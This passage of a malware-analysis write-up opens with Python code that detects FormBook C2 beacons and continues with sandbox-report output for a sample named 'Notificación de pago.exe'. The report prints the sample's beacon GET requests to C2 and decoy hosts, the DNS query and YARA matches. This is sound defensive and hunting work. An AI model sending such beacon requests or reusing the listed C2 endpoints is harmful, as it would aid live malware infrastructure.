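    """Minimal HTTP/1.1 request parser: request line, lower-cased header names, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers, "body": body}


def strip_www(host):
    return host[4:] if host.startswith("www.") else host


def c2_hosts_and_paths(config):
    """Split 'www.hkqhdq.com/d6fp/'-style entries into ({'hkqhdq.com'}, {'/d6fp/'})."""
    hosts, paths = set(), set()
    for entry in config["C2 list"]:
        host, _, path = entry.partition("/")
        hosts.add(strip_www(host))
        paths.add("/" + path)
    return hosts, paths


def classify(req, config):
    """Reasons a single request looks like a FormBook beacon (empty list = none)."""
    c2_hosts, c2_paths = c2_hosts_and_paths(config)
    host = strip_www(req["headers"].get("host", ""))
    reasons = []
    if urlsplit(req["target"]).path in c2_paths:
        reasons.append("c2_path")        # configured URI path reused on every host
    if host in c2_hosts:
        reasons.append("c2_host")
    elif host in config["decoy"]:
        reasons.append("decoy_host")     # traffic to a decoy, not the real C2
    if "user-agent" not in req["headers"]:
        reasons.append("no_user_agent")  # "HTTP GET or POST without a user agent"
    if req["body"] and not req["body"].strip(b"\x00"):
        reasons.append(f"null_padding_{len(req['body'])}")
    return reasons


def hosts_per_path(reqs):
    """One URI path fanned out over unrelated hosts is the FormBook decoy pattern."""
    out = {}
    for r in reqs:
        out.setdefault(urlsplit(r["target"]).path, set()).add(r["headers"].get("host", ""))
    return out


def constant_params(reqs):
    """Query parameters present in every request whose value never changes."""
    seen, count = {}, {}
    for r in reqs:
        for key, values in parse_qs(urlsplit(r["target"]).query).items():
            seen.setdefault(key, set()).update(values)
            count[key] = count.get(key, 0) + 1
    return {k: next(iter(v)) for k, v in seen.items() if len(v) == 1 and count[k] == len(reqs)}


def uncontacted_c2(config, reqs):
    """Configured C2 hosts that never appeared in a Host header: what blocking only observed domains misses."""
    c2_hosts, _ = c2_hosts_and_paths(config)
    contacted = {strip_www(r["headers"].get("host", "")) for r in reqs}
    return sorted(c2_hosts - contacted)


if __name__ == "__main__":
    reqs = [parse_request(raw) for raw in RAW_REQUESTS]
    for r in reqs:
        print(r["headers"]["host"], classify(r, CONFIG))
    print(hosts_per_path(reqs), constant_params(reqs), uncontacted_c2(CONFIG, reqs))
```

For blocking and hunting, take the path plus the full C2 list (real host and decoys) from the extracted configuration rather than from the PCAP; the constant second parameter and the null-padded, agent-less GET are the traits to match when the configuration is not available.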
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.263896171.0000000005F96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://en.w
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com.TTF
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html0
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comB.TTF?m
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.312759063.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.307819527.0000000005F90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coma
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcom
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comlvfetDm
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comm
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.312759063.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.307819527.0000000005F90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como)m
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comsief
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266184528.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266049177.0000000005F98000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265980144.0000000005F97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.266184528.0000000005F97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnG
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.266184528.0000000005F97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cne-dio
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.265980144.0000000005F97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnnt
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.277842098.0000000005FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/2
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.277842098.0000000005FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/n
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/)m
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/6m
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Dm
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Mm
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0?m
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Zm
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/cm6
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/hm?
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/qm(
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/~mQ
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 
00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263447229.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 
00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267071973.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comG
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 
00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267071973.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.come
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 
00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267071973.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comt
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 
00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263447229.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comt-bh
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknown | DNS traffic detected: queries for: www.evertribute.com
          Source: global traffic | HTTP traffic detected: GET /d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb HTTP/1.1 | Host: www.evertribute.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb HTTP/1.1 | Host: www.theguiriguide.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /d6fp/?7nxh=27dTALvGagYo6W4eiFO6YvZJ//Zn5pBdCa2l5DH7HNM2RGs4GWZbOB9vu5aCQaLmGkAl&q6AlF=0txdQnwxgb HTTP/1.1 | Host: www.librevillegabon.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:

          E-Banking Fraud

          Source: Yara match | File source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPE
